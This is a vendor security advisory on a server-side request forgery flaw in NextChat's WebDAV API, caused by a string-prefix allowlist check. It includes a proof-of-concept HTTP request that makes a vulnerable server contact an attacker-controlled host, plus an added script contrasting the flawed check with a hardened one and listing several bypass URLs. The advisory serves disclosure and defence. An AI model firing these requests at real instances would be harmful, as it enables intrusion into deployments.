
NextChat Server-Side Request Forgery / Cross-Site Scripting

High

Synopsis

NextChat v2.12.3 suffers from Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerabilities due to insufficient validation of the endpoint GET parameter on the WebDAV API route (/api/webdav).

The vulnerability exists because of the following code snippet:

// Validate the endpoint to prevent potential SSRF attacks
if (
  !mergedAllowedWebDavEndpoints.some(
    (allowedEndpoint) => endpoint?.startsWith(allowedEndpoint),
  )
)

This check is incomplete because it only verifies that the URL supplied in the endpoint GET parameter begins with one of the string prefixes declared in the following list:

export const internalAllowedWebDavEndpoints = [
  "https://dav.jianguoyun.com/dav/",
  "https://dav.dropdav.com/",
  "https://dav.box.com/dav",
  "https://nanao.teracloud.jp/dav/",
  "https://bora.teracloud.jp/dav/",
  "https://webdav.4shared.com/",
  "https://dav.idrivesync.com",
  "https://webdav.yandex.com",
  "https://app.koofr.net/dav/Koofr",
];

Several allowlist entries (for example https://dav.idrivesync.com, https://webdav.yandex.com and https://dav.box.com/dav) end without a trailing slash or a fixed folder, so a plain string prefix match accepts any URL that merely begins with those characters. An attacker can therefore craft a hostname or path that passes the SSRF check and make the vulnerable instance issue an arbitrary HTTPS request.

Proof Of Concept:

In order to reproduce the issue, it is possible to create an attacker-controlled hostname such as webdav.yandex.com.attacker.tld and perform the following HTTP request:

GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.attacker.tld/ HTTP/1.1
Host: VULNERABLE_NEXTCHAT_INSTANCE
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

The vulnerable instance will then issue an HTTPS request to https://webdav.yandex.com.attacker.tld/, because that string starts with the allowlisted prefix https://webdav.yandex.com.
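As an added illustration that is not part of the original advisory or of NextChat's own code, the following Node.js script places the prefix check described above beside a hardened check that compares parsed URL components (scheme, host, port and normalised path) rather than raw strings. The hardened function, the sample inputs and the two extra bypass URLs (an allowlisted host placed in the userinfo part, and a path that simply continues a prefix) are assumptions of this example; they show that the same startsWith flaw admits more than the hostname-suffix case used in the proof of concept.

```javascript
// Added example, not NextChat's own code: the advisory's prefix check next to a
// hardened check that compares parsed URL components instead of raw strings.

// Allowlist reproduced from the advisory. Entries without a trailing slash or
// fixed folder are the ones a prefix match handles badly.
const allowedWebDavEndpoints = [
  "https://dav.jianguoyun.com/dav/",
  "https://dav.dropdav.com/",
  "https://dav.box.com/dav",
  "https://nanao.teracloud.jp/dav/",
  "https://bora.teracloud.jp/dav/",
  "https://webdav.4shared.com/",
  "https://dav.idrivesync.com",
  "https://webdav.yandex.com",
  "https://app.koofr.net/dav/Koofr",
];

// The check the advisory describes: accept any endpoint that begins with an
// allowlisted string. This is the vulnerable behaviour, kept on purpose.
function isAllowedPrefixMatch(endpoint) {
  return allowedWebDavEndpoints.some((allowed) => endpoint?.startsWith(allowed));
}

// Hardened variant (an assumption of this example, not the vendor's patch):
// parse the candidate, require https with no embedded credentials, require the
// origin (scheme, host, port) to equal an allowlisted origin, and require the
// path to be the allowlisted path itself or a sub-path of it.
function isAllowedParsedMatch(endpoint) {
  let target;
  try {
    target = new URL(endpoint);
  } catch {
    return false; // unparsable input is rejected, not coerced
  }
  if (target.protocol !== "https:") return false;
  if (target.username !== "" || target.password !== "") return false;
  return allowedWebDavEndpoints.some((allowed) => {
    const base = new URL(allowed);
    if (base.origin !== target.origin) return false;
    // The WHATWG parser has already resolved "/../" segments, so a request for
    // "/dav/../secret" arrives here with pathname "/secret" and is rejected.
    const dir = base.pathname.endsWith("/") ? base.pathname : base.pathname + "/";
    return target.pathname === base.pathname || target.pathname.startsWith(dir);
  });
}

// Constructed inputs: the advisory's proof-of-concept URL, three further
// bypasses of the prefix check, and a legitimate backup path that must still pass.
const samples = [
  "https://webdav.yandex.com.attacker.tld/",                // PoC: attacker host suffix
  "https://dav.box.com/davevil/backup.json",                // path continues the prefix
  "https://webdav.yandex.com@attacker.tld/",                // allowlisted host as userinfo
  "https://dav.box.com/dav/../secret",                      // traversal out of the folder
  "https://webdav.yandex.com/chatgpt-next-web/backup.json", // legitimate backup location
];

// Returns { url: [prefixResult, parsedResult] } so the two checks can be compared.
function compareChecks(urls = samples) {
  const out = {};
  for (const u of urls) out[u] = [isAllowedPrefixMatch(u), isAllowedParsedMatch(u)];
  return out;
}

console.table(compareChecks());
```

Running the script prints one row per sample URL; every attacker-controlled sample is accepted by the prefix check and rejected by the parsed check, while the legitimate backup URL passes both. Comparing origins rather than string prefixes is what removes the whole class of bypass, including ones the proof of concept does not use.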

Solution

Upgrade to NextChat 2.12.4 or later.

Disclosure Timeline

18 June 2024 - Vulnerability discovered. Tenable sends a private security report through the GitHub repository.
24 June 2024 - Vendor accepts the security report on GitHub and discloses the advisory after releasing a patch in version 2.12.4.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2024-38514
Tenable Advisory ID: TRA-2024-23
Credit:
Rémy Marot
CVSSv3 Base / Temporal Score:
7.4 / 6.9
CVSSv3 Vector:
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
Affected Products:
NextChat < 2.12.4
Risk Factor:
High

Advisory Timeline

June 25, 2024 - Initial release